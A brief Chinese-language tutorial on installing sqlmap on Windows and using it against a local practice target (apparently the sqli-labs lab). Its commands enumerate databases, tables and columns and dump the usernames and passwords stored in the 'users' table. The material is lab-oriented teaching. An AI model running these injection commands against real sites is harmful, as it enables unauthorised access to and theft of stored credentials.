一、在网站上搜索sqlmap下载

下载链接

二、安装

1 选择地方解压
2 在桌面创建快捷方式
（1）在其中输入cmd并命名（2）右击鼠标选择快捷方式属性

（3）目标位置不变，起始位置改为sqlmap文件位置这样就完成快捷方式设置了。

三、使用

1 点击快捷方式进入
2 输入sqlmap.py -u "http://127.0.0.1/Less-1/?id=1"测试并得到如id，数据库等信息
2 进行注入
输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” --dbs可以得到数据库的具体信息
再输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” -D security --tables对某一个数据库进行具体攻击以security为例可以得到具体表
3 根据表名输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” -D security -T users --columns可以得到表内字段信息

4 再根据得到的字段名输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” -D security -T users -C “id,password,username” --dump可以得到具体的字段值
这样就完成了一次sql注入